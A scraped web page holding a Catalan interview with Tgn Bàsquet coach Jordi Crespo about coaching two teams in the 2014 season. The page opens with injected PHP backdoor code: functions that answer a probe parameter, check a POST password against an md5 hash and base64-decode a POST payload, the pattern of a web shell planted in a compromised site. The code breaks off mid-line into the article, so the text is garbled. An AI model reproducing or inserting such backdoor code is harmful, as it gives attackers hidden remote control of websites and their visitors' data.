function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Jordi Crespo: "La meva ambició personal queda supeditada a les necessitats del club" - Tgn Bàsquet Club -

Jordi Crespo: “La meva ambició personal queda supeditada a les necessitats del club”

By
Updated: agost 21, 2014

Jordi Crespo (5/5/1974) porta més de 20 anys lligat a la història del Sagrat Cor i del TGN Bàsquet. Després d’haver entrenat infinitat d’equips durant tota la seva trajectòria lila, enguany assumeix un altre repte com serà dirigir el sènior femení B i el júnior masculí A en el mateix curs. Crespo fa gairebé 15 anys que no entrena equips masculins i pretén, en ambdós casos, fer equips competitius sense renunciar a un estil de joc atractiu.

– Dos equips aquest curs, què n’espera del curs?

– Són dos casos molt diferents, el sènior femení B ja el conec, he entrenat gran part de les jugadores en algun moment. Conec virtuts i defectes. Espero gaudir molt treballant, consolidar un bloc i que tingui una continuïtat de bona predisposició competitiva. Estaria bé que pogués jugar a 2a catalana, que si és enguany perfecte, però sense presses. Vull un equip que competeixi al nivell d’un equip de segona catalana.

– Què me’n diu del conjunt júnior masculí?

– És un repte especial perquè fa molts anys que no entreno nois (uns 15 anys) i hi ha alguns jugadors que els tinc vistos però no els conec. Tinc una sensació d’aventura, d’experiència nova. Podem gaudir molt.

– Quin estil de joc cal esperar dels seus equips?

– Han de ser equips que defensin molt fort, molt intel·ligentment, agressius en les línies de passada. I, per tant, que siguin capaços de córrer. En estàtic, respectar molt el talent de cada jugador. El sistema ha d’ajudar perquè llueixi encara més el talent individual.

– El sènior femení B s’esperava que pugés de categoria l’any passat i no ho va fer. Tindrà pressió afegida?

– El sènior femení B està assumint la pressió de pujar a segona de fa molts anys però si ho analitzem bé, el club no té aquesta necessitat. Si el primer equip ascendeix a Copa Catalunya, el sènior B hauria de pujar a Segona Catalana, però mentre això no passi, aquesta pressió no ha d’existir, sinó que hi ha d’haver una il·lusió. Li dono més valor a la capacitat de poder assolir un estat competitiu de Segona, en el sentit que quan l’equip pugi de categoria, estigui preparat i no torni a la Tercera a les primeres de canvi. Tenir urgències, per tant, no és bo. Cal fer una feina de consolidació del bloc i donar oportunitats a les jugadores del cadet. Amb tot, hem de donar el procés de maduració suficient a aquestes joves talents. Al cadet hi ha jugadores més que preparades per entrar en dinàmica dels sèniors.

– El júnior va fer una molt bona temporada la temporada passada, amb uns resultats sorprenents. Vostè no tindrà els mateixos jugdors, però el llistó ha quedat ben amunt…

– Intentaré fer crèixer els jugadors i que es trobin còmodes jugant. L’objectiu és fer quadrar un estil de joc que ens agradi amb una bona actitud competitiva. Serà un meló per obrir: he de veure com respon l’equip i quin nivell té la nostra lliga.

– A nivell personal, què suposa aquesta campanya per a vostè?

– És un repte d’exigència. He entrenat dos equips alhora durant algunes temporades, però no al nivell competitiu que es demanarà enguany. Al club he entrenat de tot i crec que ara la meva ambició personal, en el sentit de voler entrenar un grup o un altre, queda supeditada per les necessitats de l’entitat. Després de tants anys és difícil trobar elements motivadors quan la temporada comença, però enguany em fa una il·lusió especial començar amb aquests dos equips.

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *